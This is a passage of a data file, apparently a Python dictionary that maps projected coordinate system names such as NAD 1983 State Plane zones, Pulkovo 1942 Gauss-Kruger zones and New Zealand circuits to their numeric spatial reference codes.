21474, 'Beijing_1954_GK_Zone_15N': 21475, 'Beijing_1954_GK_Zone_16N': 21476, 'Beijing_1954_GK_Zone_17N': 21477, 'Beijing_1954_GK_Zone_18N': 21478, 'Beijing_1954_GK_Zone_19N': 21479, 'Beijing_1954_GK_Zone_20N': 21480, 'Beijing_1954_GK_Zone_21N': 21481, 'Beijing_1954_GK_Zone_22N': 21482, 'Beijing_1954_GK_Zone_23N': 21483, 'Belge_Lambert_1950': 21500, 'Bern_1898_Bern_LV03C': 21780, 'CH1903_LV03': 21781, 'Bogota_UTM_Zone_17N': 21817, 'Bogota_UTM_Zone_18N': 21818, 'Colombia_West_Zone': 21891, 'Colombia_Bogota_Zone': 21892, 'Colombia_East_Central_Zone': 21893, 'Colombia_East_Zone': 21894, 'Colombia_West_Zone': 21896, 'Colombia_Bogota_Zone': 21897, 'Colombia_East_Central_Zone': 21898, 'Colombia_East_Zone': 21899, 'Camacupa_UTM_Zone_32S': 22032, 'Camacupa_UTM_Zone_33S': 22033, 'Camacupa_TM_11_30_SE': 22091, 'Camacupa_TM_12_SE': 22092, 'POSGAR_1998_Argentina_Zone_1': 22171, 'POSGAR_1998_Argentina_Zone_2': 22172, 'POSGAR_1998_Argentina_Zone_3': 22173, 'POSGAR_1998_Argentina_Zone_4': 22174, 'POSGAR_1998_Argentina_Zone_5': 22175, 'POSGAR_1998_Argentina_Zone_6': 22176, 'POSGAR_1998_Argentina_Zone_7': 22177, 'POSGAR_1994_Argentina_Zone_1': 22181, 'POSGAR_1994_Argentina_Zone_2': 22182, 'POSGAR_1994_Argentina_Zone_3': 22183, 'POSGAR_1994_Argentina_Zone_4': 22184, 'POSGAR_1994_Argentina_Zone_5': 22185, 'POSGAR_1994_Argentina_Zone_6': 22186, 'POSGAR_1994_Argentina_Zone_7': 22187, 'Argentina_Zone_1': 22191, 'Argentina_Zone_2': 22192, 'Argentina_Zone_3': 22193, 'Argentina_Zone_4': 22194, 'Argentina_Zone_5': 22195, 'Argentina_Zone_6': 22196, 'Argentina_Zone_7': 22197, 'Cape_UTM_Zone_34S': 22234, 'Cape_UTM_Zone_35S': 22235, 'Cape_UTM_Zone_36S': 22236, 'Carthage_UTM_Zone_32N': 22332, 'Nord_Tunisie': 22391, 'Sud_Tunisie': 22392, 'Corrego_Alegre_UTM_Zone_21S': 22521, 'Corrego_Alegre_UTM_Zone_22S': 22522, 'Corrego_Alegre_UTM_Zone_23S': 22523, 'Corrego_Alegre_UTM_Zone_24S': 22524, 'Corrego_Alegre_UTM_Zone_25S': 22525, 'Deir_ez_Zor_Levant_Zone': 22700, 'Deir_ez_Zor_Syria_Lambert': 22770, 'Deir_ez_Zor_Levant_Stereographic': 22780, 'Douala_UTM_Zone_32N': 22832, 'Egypt_Blue_Belt': 22991, 'Egypt_Red_Belt': 22992, 'Egypt_Purple_Belt': 22993, 'Egypt_Extended_Purple_Belt': 22994, 'ED_1950_UTM_Zone_28N': 23028, 'ED_1950_UTM_Zone_29N': 23029, 'ED_1950_UTM_Zone_30N': 23030, 'ED_1950_UTM_Zone_31N': 23031, 'ED_1950_UTM_Zone_32N': 23032, 'ED_1950_UTM_Zone_33N': 23033, 'ED_1950_UTM_Zone_34N': 23034, 'ED_1950_UTM_Zone_35N': 23035, 'ED_1950_UTM_Zone_36N': 23036, 'ED_1950_UTM_Zone_37N': 23037, 'ED_1950_UTM_Zone_38N': 23038, 'ED_1950_TM_0_N': 23090, 'ED_1950_TM_5_NE': 23095, 'Fahud_UTM_Zone_39N': 23239, 'Fahud_UTM_Zone_40N': 23240, 'Garoua_UTM_Zone_33N': 23433, 'Hungarian_1972_Egyseges_Orszagos_Vetuleti': 23700, 'DGN_1995_Indonesia_TM-3_Zone_46.2': 23830, 'DGN_1995_Indonesia_TM-3_Zone_47.1': 23831, 'DGN_1995_Indonesia_TM-3_Zone_47.2': 23832, 'DGN_1995_Indonesia_TM-3_Zone_48.1': 23833, 'DGN_1995_Indonesia_TM-3_Zone_48.2': 23834, 'DGN_1995_Indonesia_TM-3_Zone_49.1': 23835, 'DGN_1995_Indonesia_TM-3_Zone_49.2': 23836, 'DGN_1995_Indonesia_TM-3_Zone_50.1': 23837, 'DGN_1995_Indonesia_TM-3_Zone_50.2': 23838, 'DGN_1995_Indonesia_TM-3_Zone_51.1': 23839, 'DGN_1995_Indonesia_TM-3_Zone_51.2': 23840, 'DGN_1995_Indonesia_TM-3_Zone_52.1': 23841, 'DGN_1995_Indonesia_TM-3_Zone_52.2': 23842, 'DGN_1995_Indonesia_TM-3_Zone_53.1': 23843, 'DGN_1995_Indonesia_TM-3_Zone_53.2': 23844, 'DGN_1995_Indonesia_TM-3_Zone_54.1': 23845, 'Indonesian_1974_UTM_Zone_46N': 23846, 'Indonesian_1974_UTM_Zone_47N': 23847, 'Indonesian_1974_UTM_Zone_48N': 23848, 'Indonesian_1974_UTM_Zone_49N': 23849, 'Indonesian_1974_UTM_Zone_50N': 23850, 'Indonesian_1974_UTM_Zone_51N': 23851, 'Indonesian_1974_UTM_Zone_52N': 23852, 'Indonesian_1974_UTM_Zone_53N': 23853, 'DGN_1995_UTM_Zone_46N': 23866, 'DGN_1995_UTM_Zone_47N': 23867, 'DGN_1995_UTM_Zone_48N': 23868, 'DGN_1995_UTM_Zone_49N': 23869, 'DGN_1995_UTM_Zone_50N': 23870, 'DGN_1995_UTM_Zone_51N': 23871, 'DGN_1995_UTM_Zone_52N': 23872, 'DGN_1995_UTM_Zone_47S': 23877, 'DGN_1995_UTM_Zone_48S': 23878, 'DGN_1995_UTM_Zone_49S': 23879, 'DGN_1995_UTM_Zone_50S': 23880, 'DGN_1995_UTM_Zone_51S': 23881, 'DGN_1995_UTM_Zone_52S': 23882, 'DGN_1995_UTM_Zone_53S': 23883, 'DGN_1995_UTM_Zone_54S': 23884, 'Indonesian_1974_UTM_Zone_46S': 23886, 'Indonesian_1974_UTM_Zone_47S': 23887, 'Indonesian_1974_UTM_Zone_48S': 23888, 'Indonesian_1974_UTM_Zone_49S': 23889, 'Indonesian_1974_UTM_Zone_50S': 23890, 'Indonesian_1974_UTM_Zone_51S': 23891, 'Indonesian_1974_UTM_Zone_52S': 23892, 'Indonesian_1974_UTM_Zone_53S': 23893, 'Indonesian_1974_UTM_Zone_54S': 23894, 'Indian_1954_UTM_Zone_46N': 23946, 'Indian_1954_UTM_Zone_47N': 23947, 'Indian_1954_UTM_Zone_48N': 23948, 'Indian_1975_UTM_Zone_47N': 24047, 'Indian_1975_UTM_Zone_48N': 24048, 'Jamaica_1875_Old_Grid': 24100, 'Jamaica_Grid': 24200, 'Kalianpur_1937_UTM_Zone_45N': 24305, 'Kalianpur_1937_UTM_Zone_46N': 24306, 'Kalianpur_1962_UTM_Zone_41N': 24311, 'Kalianpur_1962_UTM_Zone_42N': 24312, 'Kalianpur_1962_UTM_Zone_43N': 24313, 'Kalianpur_1975_UTM_Zone_42N': 24342, 'Kalianpur_1975_UTM_Zone_43N': 24343, 'Kalianpur_1975_UTM_Zone_44N': 24344, 'Kalianpur_1975_UTM_Zone_45N': 24345, 'Kalianpur_1975_UTM_Zone_46N': 24346, 'Kalianpur_1975_UTM_Zone_47N': 24347, 'Kalianpur_1880_India_Zone_0': 24370, 'Kalianpur_1880_India_Zone_I': 24371, 'Kalianpur_1880_India_Zone_IIa': 24372, 'Kalianpur_1880_India_Zone_III': 24373, 'Kalianpur_1880_India_Zone_IV': 24374, 'Kalianpur_1937_India_Zone_IIb': 24375, 'Kalianpur_1962_India_Zone_I': 24376, 'Kalianpur_1962_India_Zone_IIa': 24377, 'Kalianpur_1975_India_Zone_I': 24378, 'Kalianpur_1975_India_Zone_IIa': 24379, 'Kalianpur_1975_India_Zone_IIb': 24380, 'Kalianpur_1975_India_Zone_III': 24381, 'Kalianpur_1880_India_Zone_IIb': 24382, 'Kalianpur_1975_India_Zone_IV': 24383, 'Kertau_Singapore_Grid': 24500, 'Kertau_UTM_Zone_47N': 24547, 'Kertau_UTM_Zone_48N': 24548, 'Kertau_RSO_Malaya_Chains': 24571, 'KOC_Lambert': 24600, 'La_Canoa_UTM_Zone_18N': 24718, 'La_Canoa_UTM_Zone_19N': 24719, 'La_Canoa_UTM_Zone_20N': 24720, 'La_Canoa_UTM_Zone_21N': 24721, 'PSAD_1956_UTM_Zone_17N': 24817, 'PSAD_1956_UTM_Zone_18N': 24818, 'PSAD_1956_UTM_Zone_19N': 24819, 'PSAD_1956_UTM_Zone_20N': 24820, 'PSAD_1956_UTM_Zone_21N': 24821, 'PSAD_1956_UTM_Zone_17S': 24877, 'PSAD_1956_UTM_Zone_18S': 24878, 'PSAD_1956_UTM_Zone_19S': 24879, 'PSAD_1956_UTM_Zone_20S': 24880, 'PSAD_1956_UTM_Zone_21S': 24881, 'PSAD_1956_UTM_Zone_22S': 24882, 'Peru_West_Zone': 24891, 'Peru_Central_Zone': 24892, 'Peru_East_Zone': 24893, 'Ghana_Metre_Grid': 25000, 'Lome_UTM_Zone_31N': 25231, 'Philippines_Zone_I': 25391, 'Philippines_Zone_II': 25392, 'Philippines_Zone_III': 25393, 'Philippines_Zone_IV': 25394, 'Philippines_Zone_V': 25395, 'ETRS_1989_UTM_Zone_28N': 25828, 'ETRS_1989_UTM_Zone_29N': 25829, 'ETRS_1989_UTM_Zone_30N': 25830, 'ETRS_1989_UTM_Zone_31N': 25831, 'ETRS_1989_UTM_Zone_32N': 25832, 'ETRS_1989_UTM_Zone_33N': 25833, 'ETRS_1989_UTM_Zone_34N': 25834, 'ETRS_1989_UTM_Zone_35N': 25835, 'ETRS_1989_UTM_Zone_36N': 25836, 'ETRS_1989_UTM_Zone_37N': 25837, 'ETRS_1989_UTM_Zone_38N': 25838, 'ETRS_1989_TM_Baltic_1993': 25884, 'Malongo_1987_UTM_Zone_32S': 25932, 'Nord_Maroc': 26191, 'Sud_Maroc': 26192, 'Sahara': 26193, 'Merchich_Sahara_Nord': 26194, 'Merchich_Sahara_Sud': 26195, 'Massawa_UTM_Zone_37N': 26237, 'Minna_UTM_Zone_31N': 26331, 'Minna_UTM_Zone_32N': 26332, 'Nigeria_West_Belt': 26391, 'Nigeria_Mid_Belt': 26392, 'Nigeria_East_Belt': 26393, 'Mhast_UTM_Zone_32S': 26432, 'Monte_Mario_Rome_Italy_1': 26591, 'Monte_Mario_Rome_Italy_2': 26592, 'Mporaloko_UTM_Zone_32N': 26632, 'Mporaloko_UTM_Zone_32S': 26692, 'NAD_1927_UTM_Zone_1N': 26701, 'NAD_1927_UTM_Zone_2N': 26702, 'NAD_1927_UTM_Zone_3N': 26703, 'NAD_1927_UTM_Zone_4N': 26704, 'NAD_1927_UTM_Zone_5N': 26705, 'NAD_1927_UTM_Zone_6N': 26706, 'NAD_1927_UTM_Zone_7N': 26707, 'NAD_1927_UTM_Zone_8N': 26708, 'NAD_1927_UTM_Zone_9N': 26709, 'NAD_1927_UTM_Zone_10N': 26710, 'NAD_1927_UTM_Zone_11N': 26711, 'NAD_1927_UTM_Zone_12N': 26712, 'NAD_1927_UTM_Zone_13N': 26713, 'NAD_1927_UTM_Zone_14N': 26714, 'NAD_1927_UTM_Zone_15N': 26715, 'NAD_1927_UTM_Zone_16N': 26716, 'NAD_1927_UTM_Zone_17N': 26717, 'NAD_1927_UTM_Zone_18N': 26718, 'NAD_1927_UTM_Zone_19N': 26719, 'NAD_1927_UTM_Zone_20N': 26720, 'NAD_1927_UTM_Zone_21N': 26721, 'NAD_1927_UTM_Zone_22N': 26722, 'NAD_1927_StatePlane_Alabama_East_FIPS_0101': 26729, 'NAD_1927_StatePlane_Alabama_West_FIPS_0102': 26730, 'NAD_1927_StatePlane_Alaska_1_FIPS_5001': 26731, 'NAD_1927_StatePlane_Alaska_2_FIPS_5002': 26732, 'NAD_1927_StatePlane_Alaska_3_FIPS_5003': 26733, 'NAD_1927_StatePlane_Alaska_4_FIPS_5004': 26734, 'NAD_1927_StatePlane_Alaska_5_FIPS_5005': 26735, 'NAD_1927_StatePlane_Alaska_6_FIPS_5006': 26736, 'NAD_1927_StatePlane_Alaska_7_FIPS_5007': 26737, 'NAD_1927_StatePlane_Alaska_8_FIPS_5008': 26738, 'NAD_1927_StatePlane_Alaska_9_FIPS_5009': 26739, 'NAD_1927_StatePlane_Alaska_10_FIPS_5010': 26740, 'NAD_1927_StatePlane_California_I_FIPS_0401': 26741, 'NAD_1927_StatePlane_California_II_FIPS_0402': 26742, 'NAD_1927_StatePlane_California_III_FIPS_0403': 26743, 'NAD_1927_StatePlane_California_IV_FIPS_0404': 26744, 'NAD_1927_StatePlane_California_V_FIPS_0405': 26745, 'NAD_1927_StatePlane_California_VI_FIPS_0406': 26746, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26747, 'NAD_1927_StatePlane_Arizona_East_FIPS_0201': 26748, 'NAD_1927_StatePlane_Arizona_Central_FIPS_0202': 26749, 'NAD_1927_StatePlane_Arizona_West_FIPS_0203': 26750, 'NAD_1927_StatePlane_Arkansas_North_FIPS_0301': 26751, 'NAD_1927_StatePlane_Arkansas_South_FIPS_0302': 26752, 'NAD_1927_StatePlane_Colorado_North_FIPS_0501': 26753, 'NAD_1927_StatePlane_Colorado_Central_FIPS_0502': 26754, 'NAD_1927_StatePlane_Colorado_South_FIPS_0503': 26755, 'NAD_1927_StatePlane_Connecticut_FIPS_0600': 26756, 'NAD_1927_StatePlane_Delaware_FIPS_0700': 26757, 'NAD_1927_StatePlane_Florida_East_FIPS_0901': 26758, 'NAD_1927_StatePlane_Florida_West_FIPS_0902': 26759, 'NAD_1927_StatePlane_Florida_North_FIPS_0903': 26760, 'NAD_1927_StatePlane_Hawaii_1_FIPS_5101': 26761, 'NAD_1927_StatePlane_Hawaii_2_FIPS_5102': 26762, 'NAD_1927_StatePlane_Hawaii_3_FIPS_5103': 26763, 'NAD_1927_StatePlane_Hawaii_4_FIPS_5104': 26764, 'NAD_1927_StatePlane_Hawaii_5_FIPS_5105': 26765, 'NAD_1927_StatePlane_Georgia_East_FIPS_1001': 26766, 'NAD_1927_StatePlane_Georgia_West_FIPS_1002': 26767, 'NAD_1927_StatePlane_Idaho_East_FIPS_1101': 26768, 'NAD_1927_StatePlane_Idaho_Central_FIPS_1102': 26769, 'NAD_1927_StatePlane_Idaho_West_FIPS_1103': 26770, 'NAD_1927_StatePlane_Illinois_East_FIPS_1201': 26771, 'NAD_1927_StatePlane_Illinois_West_FIPS_1202': 26772, 'NAD_1927_StatePlane_Indiana_East_FIPS_1301': 26773, 'NAD_1927_StatePlane_Indiana_West_FIPS_1302': 26774, 'NAD_1927_StatePlane_Iowa_North_FIPS_1401': 26775, 'NAD_1927_StatePlane_Iowa_South_FIPS_1402': 26776, 'NAD_1927_StatePlane_Kansas_North_FIPS_1501': 26777, 'NAD_1927_StatePlane_Kansas_South_FIPS_1502': 26778, 'NAD_1927_StatePlane_Kentucky_North_FIPS_1601': 26779, 'NAD_1927_StatePlane_Kentucky_South_FIPS_1602': 26780, 'NAD_1927_StatePlane_Louisiana_North_FIPS_1701': 26781, 'NAD_1927_StatePlane_Louisiana_South_FIPS_1702': 26782, 'NAD_1927_StatePlane_Maine_East_FIPS_1801': 26783, 'NAD_1927_StatePlane_Maine_West_FIPS_1802': 26784, 'NAD_1927_StatePlane_Maryland_FIPS_1900': 26785, 'NAD_1927_StatePlane_Massachusetts_Mainland_FIPS_2001': 26786, 'NAD_1927_StatePlane_Massachusetts_Island_FIPS_2002': 26787, 'NAD_1927_StatePlane_Michigan_North_FIPS_2111': 26788, 'NAD_1927_StatePlane_Michigan_Central_FIPS_2112': 26789, 'NAD_1927_StatePlane_Michigan_South_FIPS_2113': 26790, 'NAD_1927_StatePlane_Minnesota_North_FIPS_2201': 26791, 'NAD_1927_StatePlane_Minnesota_Central_FIPS_2202': 26792, 'NAD_1927_StatePlane_Minnesota_South_FIPS_2203': 26793, 'NAD_1927_StatePlane_Mississippi_East_FIPS_2301': 26794, 'NAD_1927_StatePlane_Mississippi_West_FIPS_2302': 26795, 'NAD_1927_StatePlane_Missouri_East_FIPS_2401': 26796, 'NAD_1927_StatePlane_Missouri_Central_FIPS_2402': 26797, 'NAD_1927_StatePlane_Missouri_West_FIPS_2403': 26798, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26799, 'NAD_Michigan_StatePlane_Michigan_East_Old_FIPS_2101': 26801, 'NAD_Michigan_StatePlane_Michigan_Central_Old_FIPS_2102': 26802, 'NAD_Michigan_StatePlane_Michigan_West_Old_FIPS_2103': 26803, 'NAD_Michigan_StatePlane_Michigan_North_FIPS_2111': 26811, 'NAD_Michigan_StatePlane_Michigan_Central_FIPS_2112': 26812, 'NAD_Michigan_StatePlane_Michigan_South_FIPS_2113': 26813, 'NAD_1983_UTM_Zone_1N': 26901, 'NAD_1983_UTM_Zone_2N': 26902, 'NAD_1983_UTM_Zone_3N': 26903, 'NAD_1983_UTM_Zone_4N': 26904, 'NAD_1983_UTM_Zone_5N': 26905, 'NAD_1983_UTM_Zone_6N': 26906, 'NAD_1983_UTM_Zone_7N': 26907, 'NAD_1983_UTM_Zone_8N': 26908, 'NAD_1983_UTM_Zone_9N': 26909, 'NAD_1983_UTM_Zone_10N': 26910, 'NAD_1983_UTM_Zone_11N': 26911, 'NAD_1983_UTM_Zone_12N': 26912, 'NAD_1983_UTM_Zone_13N': 26913, 'NAD_1983_UTM_Zone_14N': 26914, 'NAD_1983_UTM_Zone_15N': 26915, 'NAD_1983_UTM_Zone_16N': 26916, 'NAD_1983_UTM_Zone_17N': 26917, 'NAD_1983_UTM_Zone_18N': 26918, 'NAD_1983_UTM_Zone_19N': 26919, 'NAD_1983_UTM_Zone_20N': 26920, 'NAD_1983_UTM_Zone_21N': 26921, 'NAD_1983_UTM_Zone_22N': 26922, 'NAD_1983_UTM_Zone_23N': 26923, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101': 26929, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102': 26930, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001': 26931, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002': 26932, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003': 26933, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004': 26934, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005': 26935, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006': 26936, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007': 26937, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008': 26938, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009': 26939, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010': 26940, 'NAD_1983_StatePlane_California_I_FIPS_0401': 26941, 'NAD_1983_StatePlane_California_II_FIPS_0402': 26942, 'NAD_1983_StatePlane_California_III_FIPS_0403': 26943, 'NAD_1983_StatePlane_California_IV_FIPS_0404': 26944, 'NAD_1983_StatePlane_California_V_FIPS_0405': 26945, 'NAD_1983_StatePlane_California_VI_FIPS_0406': 26946, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201': 26948, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202': 26949, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203': 26950, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301': 26951, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302': 26952, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501': 26953, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502': 26954, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503': 26955, 'NAD_1983_StatePlane_Connecticut_FIPS_0600': 26956, 'NAD_1983_StatePlane_Delaware_FIPS_0700': 26957, 'NAD_1983_StatePlane_Florida_East_FIPS_0901': 26958, 'NAD_1983_StatePlane_Florida_West_FIPS_0902': 26959, 'NAD_1983_StatePlane_Florida_North_FIPS_0903': 26960, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101': 26961, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102': 26962, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103': 26963, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104': 26964, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105': 26965, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001': 26966, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002': 26967, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101': 26968, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102': 26969, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103': 26970, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201': 26971, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202': 26972, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301': 26973, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302': 26974, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401': 26975, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402': 26976, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501': 26977, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502': 26978, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 26979, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602': 26980, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701': 26981, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702': 26982, 'NAD_1983_StatePlane_Maine_East_FIPS_1801': 26983, 'NAD_1983_StatePlane_Maine_West_FIPS_1802': 26984, 'NAD_1983_StatePlane_Maryland_FIPS_1900': 26985, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001': 26986, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002': 26987, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111': 26988, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112': 26989, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113': 26990, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201': 26991, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202': 26992, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203': 26993, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301': 26994, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302': 26995, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401': 26996, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402': 26997, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403': 26998, 'Nahrwan_1967_UTM_Zone_37N': 27037, 'Nahrwan_1967_UTM_Zone_38N': 27038, 'Nahrwan_1967_UTM_Zone_39N': 27039, 'Nahrwan_1967_UTM_Zone_40N': 27040, 'Naparima_1972_UTM_Zone_20N': 27120, 'GD_1949_New_Zealand_Map_Grid': 27200, 'NZGD_1949_Mount_Eden_Circuit': 27205, 'NZGD_1949_Bay_of_Plenty_Circuit': 27206, 'NZGD_1949_Poverty_Bay_Circuit': 27207, 'NZGD_1949_Hawkes_Bay_Circuit': 27208, 'NZGD_1949_Taranaki_Circuit': 27209, 'NZGD_1949_Tuhirangi_Circuit': 27210, 'NZGD_1949_Wanganui_Circuit': 27211, 'NZGD_1949_Wairarapa_Circuit': 27212, 'NZGD_1949_Wellington_Circuit': 27213, 'NZGD_1949_Collingwood_Circuit': 27214, 'NZGD_1949_Nelson_Circuit': 27215, 'NZGD_1949_Karamea_Circuit': 27216, 'NZGD_1949_Buller_Circuit': 27217, 'NZGD_1949_Grey_Circuit': 27218, 'NZGD_1949_Amuri_Circuit': 27219, 'NZGD_1949_Marlborough_Circuit': 27220, 'NZGD_1949_Hokitika_Circuit': 27221, 'NZGD_1949_Okarito_Circuit': 27222, 'NZGD_1949_Jacksons_Bay_Circuit': 27223, 'NZGD_1949_Mount_Pleasant_Circuit': 27224, 'NZGD_1949_Gawler_Circuit': 27225, 'NZGD_1949_Timaru_Circuit': 27226, 'NZGD_1949_Lindis_Peak_Circuit': 27227, 'NZGD_1949_Mount_Nicholas_Circuit': 27228, 'NZGD_1949_Mount_York_Circuit': 27229, 'NZGD_1949_Observation_Point_Circuit': 27230, 'NZGD_1949_North_Taieri_Circuit': 27231, 'NZGD_1949_Bluff_Circuit': 27232, 'NZGD_1949_UTM_Zone_58S': 27258, 'NZGD_1949_UTM_Zone_59S': 27259, 'NZGD_1949_UTM_Zone_60S': 27260, 'New_Zealand_North_Island': 27291, 'New_Zealand_South_Island': 27292, 'NGO_1948_Oslo_Norway_Zone_1': 27391, 'NGO_1948_Oslo_Norway_Zone_2': 27392, 'NGO_1948_Oslo_Norway_Zone_3': 27393, 'NGO_1948_Oslo_Norway_Zone_4': 27394, 'NGO_1948_Oslo_Norway_Zone_5': 27395, 'NGO_1948_Oslo_Norway_Zone_6': 27396, 'NGO_1948_Oslo_Norway_Zone_7': 27397, 'NGO_1948_Oslo_Norway_Zone_8': 27398, 'Datum_73_UTM_Zone_29N': 27429, 'Datum_73_Modified_Portuguese_Grid': 27492, 'Nord_de_Guerre': 27500, 'NTF_Paris_Lambert_Nord_France': 27561, 'NTF_Paris_Lambert_Centre_France': 27562, 'NTF_Paris_Lambert_Sud_France': 27563, 'NTF_Paris_Lambert_Corse': 27564, 'NTF_Paris_Lambert_Zone_I': 27571, 'NTF_Paris_Lambert_Zone_II': 27572, 'NTF_Paris_Lambert_Zone_III': 27573, 'NTF_Paris_Lambert_Zone_IV': 27574, 'NTF_Paris_France_I': 27581, 'NTF_Paris_France_II': 27582, 'NTF_Paris_France_III': 27583, 'NTF_Paris_France_IV': 27584, 'NTF_Paris_Nord_France': 27591, 'NTF_Paris_Centre_France': 27592, 'NTF_Paris_Sud_France': 27593, 'NTF_Paris_Corse': 27594, 'British_National_Grid': 27700, 'Palestine_1923_Palestine_Grid': 28191, 'Palestine_1923_Palestine_Belt': 28192, 'Palestine_1923_Israel_CS_Grid': 28193, 'Pointe_Noire_UTM_Zone_32S': 28232, 'GDA_1994_MGA_Zone_48': 28348, 'GDA_1994_MGA_Zone_49': 28349, 'GDA_1994_MGA_Zone_50': 28350, 'GDA_1994_MGA_Zone_51': 28351, 'GDA_1994_MGA_Zone_52': 28352, 'GDA_1994_MGA_Zone_53': 28353, 'GDA_1994_MGA_Zone_54': 28354, 'GDA_1994_MGA_Zone_55': 28355, 'GDA_1994_MGA_Zone_56': 28356, 'GDA_1994_MGA_Zone_57': 28357, 'GDA_1994_MGA_Zone_58': 28358, 'Pulkovo_1942_GK_Zone_2': 28402, 'Pulkovo_1942_GK_Zone_3': 28403, 'Pulkovo_1942_GK_Zone_4': 28404, 'Pulkovo_1942_GK_Zone_5': 28405, 'Pulkovo_1942_GK_Zone_6': 28406, 'Pulkovo_1942_GK_Zone_7': 28407, 'Pulkovo_1942_GK_Zone_8': 28408, 'Pulkovo_1942_GK_Zone_9': 28409, 'Pulkovo_1942_GK_Zone_10': 28410, 'Pulkovo_1942_GK_Zone_11': 28411, 'Pulkovo_1942_GK_Zone_12': 28412, 'Pulkovo_1942_GK_Zone_13': 28413, 'Pulkovo_1942_GK_Zone_14': 28414, 'Pulkovo_1942_GK_Zone_15': 28415, 'Pulkovo_1942_GK_Zone_16': 28416, 'Pulkovo_1942_GK_Zone_17': 28417, 'Pulkovo_1942_GK_Zone_18': 28418, 'Pulkovo_1942_GK_Zone_19': 28419, 'Pulkovo_1942_GK_Zone_20': 28420, 'Pulkovo_1942_GK_Zone_21': 28421, 'Pulkovo_1942_GK_Zone_22': 28422, 'Pulkovo_1942_GK_Zone_23': 28423, 'Pulkovo_1942_GK_Zone_24': 28424, 'Pulkovo_1942_GK_Zone_25': 28425, 'Pulkovo_1942_GK_Zone_26': 28426, 'Pulkovo_1942_GK_Zone_27': 28427, 'Pulkovo_1942_GK_Zone_28': 28428, 'Pulkovo_1942_GK_Zone_29': 28429, 'Pulkovo_1942_GK_Zone_30': 28430, 'Pulkovo_1942_GK_Zone_31': 28431, 'Pulkovo_1942_GK_Zone_32': 28432, 'Pulkovo_1942_GK_Zone_2N': 28462, 'Pulkovo_1942_GK_Zone_3N': 28463, 'Pulkovo_1942_GK_Zone_4N': 28464, 'Pulkovo_1942_GK_Zone_5N': 28465, 'Pulkovo_1942_GK_Zone_6N': 28466, 'Pulkovo_1942_GK_Zone_7N': 28467, 'Pulkovo_1942_GK_Zone_8N': 28468, 'Pulkovo_1942_GK_Zone_9N': 28469, 'Pulkovo_1942_GK_Zone_10N': 28470, 'Pulkovo_1942_GK_Zone_11N': 28471, 'Pulkovo_1942_GK_Zone_12N': 28472, 'Pulkovo_1942_GK_Zone_13N': 28473, 'Pulkovo_1942_GK_Zone_14N': 28474, 'Pulkovo_1942_GK_Zone_15N': 28475, 'Pulkovo_1942_GK_Zone_16N': 28476, 'Pulkovo_1942_GK_Zone_17N': 28477, 'Pulkovo_1942_GK_Zone_18N': 28478, 'Pulkovo_1942_GK_Zone_19N': 28479, 'Pulkovo_1942_GK_Zone_20N': 28480, 'Pulkovo_1942_GK_Zone_21N': 28481, 'Pulkovo_1942_GK_Zone_22N': 28482, 'Pulkovo_1942_GK_Zone_23N': 28483, 'Pulkovo_1942_GK_Zone_24N': 28484, 'Pulkovo_1942_GK_Zone_25N': 28485, 'Pulkovo_1942_GK_Zone_26N': 28486, 'Pulkovo_1942_GK_Zone_27N': 28487, 'Pulkovo_1942_GK_Zone_28N': 28488, 'Pulkovo_1942_GK_Zone_29N': 28489, 'Pulkovo_1942_GK_Zone_30N': 28490, 'Pulkovo_1942_GK_Zone_31N': 28491, 'Pulkovo_1942_GK_Zone_32N': 28492, 'Qatar_National_Grid': 28600, 'RD_Old': 28991, 'RD_New': 28992, 'SAD_1969_Brazil_Polyconic': 29100, 